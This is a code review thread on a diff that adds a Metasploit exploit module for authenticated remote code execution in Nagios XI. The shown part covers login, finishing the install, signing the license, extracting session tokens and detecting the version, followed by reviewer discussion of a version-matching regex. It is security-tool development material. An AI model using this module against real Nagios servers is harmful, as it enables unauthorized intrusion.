modules/exploits/linux/http/nagios_xi_configwizards_authenticated_rce.rb

```diff
@@ -0,0 +1,254 @@
+    ]
+  end
+
+  def username
+    datastore['USERNAME']
+  end
+
+  def password
+    datastore['PASSWORD']
+  end
+
+  def finish_install
+    datastore['FINISH_INSTALL']
+  end
+
+  def authenticate
+    # Use nagios_xi_login to try and authenticate.
+    login_result, res_array = nagios_xi_login(username, password, finish_install)
+    case login_result
+    when 1..3 # An error occurred, propagate the error message
+      return login_result, res_array[0]
+    when 4 # Nagios XI is not fully installed
+      install_result = install_nagios_xi(password)
+      if install_result # On installation failure, result is an array with the code and error message
+        return install_result[0], install_result[1]
+      end
+
+      login_result, res_array = login_after_install_or_license(username, password, finish_install)
+      case login_result
+      when 1..4 # An error occurred, propagate the error message
+        return login_result, res_array[0]
+      when 5 # The license agreement still needs to be signed
+        auth_cookies, nsp = res_array
+        sign_license_result = sign_license_agreement(auth_cookies, nsp)
+        if sign_license_result
+          return 5, 'Failed to sign license agreement'
+        end
+
+        print_status('License agreement signed. The module will wait for 5 seconds and retry the login.')
+        sleep 5
+        login_result, res_array = login_after_install_or_license(username, password, finish_install)
+        case login_result
+        when 1..4 # An error occurred, propagate the error message
+          return login_result, res_array[0]
+        when 5 # The Nagios XI license agreement still has not been signed
+          return 5, 'Failed to sign the license agreement.'
+        end
+      end
+    end
+
+    print_good('Successfully authenticated to Nagios XI.')
+    # Extract the authenticated cookies and nsp to use throughout the module
+    if res_array.length == 2
+      @auth_cookies = res_array[1]
+      nsp = res_array[0].scan(/nsp_str = "([a-z0-9]+)/)
+      if nsp
+        @nsp = nsp[0][0]
+      else
+        return login_result, 'Failed to extract nsp string'
+      end
+    else
+      return login_result, 'Failed to extract auth cookies and nsp string'
+    end
+
+    # Set the version here so both check and exploit can use it
+    nagios_version = nagios_xi_version(res_array[0])
+    if nagios_version.nil?
+      return 6, 'Unable to obtain the Nagios XI version from the dashboard'
+    end
+
+    print_status("Target is Nagios XI with version #{nagios_version}.")
+
+    # Versions of NagiosXI pre-5.2 have different formats (5r1.0, 2014r2.7, 2012r2.8b, etc.) that Rex cannot handle,
+    # so we set pre-5.2 versions to 1.0.0 for easier Rex comparison because the module only works on post-5.2 versions.
+    if /^\d{4}R\d\.\d/.match(nagios_version) || /^\d{4}RC\d/.match(nagios_version) || /^\d{4}R\d.\d[A-Ha-h]/.match(nagios_version) || nagios_version == '5R1.0'
```

Comment:
```suggestion
    if /^\d{4}[Rr]\d\.\d/.match(nagios_version) || /^\d{4}RC\d/.match(nagios_version) || /^\d{4}[Rr]\d.\d[A-Ha-h]/.match(nagios_version) || nagios_version == '5R1.0'
```

This will allow you to detect versions like [xi-2009r1.1f](https://assets.nagios.com/downloads/nagiosxi/2009/xi-2009r1.1f.tar.gz), as well as [xi-2014r2.5](https://assets.nagios.com/downloads/nagiosxi/2014/xi-2014r2.5.tar.gz)

Reply:
Actually on second thought, I don't know of any releases where the release number was put after an uppercase R, the only uppercase version appears to be for RC.

Reply:
[2009r1.4bi](https://assets.nagios.com/downloads/nagiosxi/2009/xi-2009r1.4bi.tar.gz) is another edge case we'd need to handle here along with [2009r1fix](https://assets.nagios.com/downloads/nagiosxi/2009/xi-2009r1fix.tar.gz). I'll see if I can't combine this all into one regex for ya.

Reply:
Okay found a regex that works to handle all the cases here:

```
^\d{4}r\d(?:\.\d)?(?:(?:RC\d)|(?:[a-z]{1,3}))?$
```

Reply:
Okay should be able to alter it to this:

```
if /^\d{4}r\d(?:\.\d)?(?:(?:RC\d)|(?:[a-z]{1,3}))?$/.match(nagios_version) || nagios_version == '5r1.0'
```

Reply:
Wonderful, made this change and tested it locally

Reply:
Marking as resolved 👍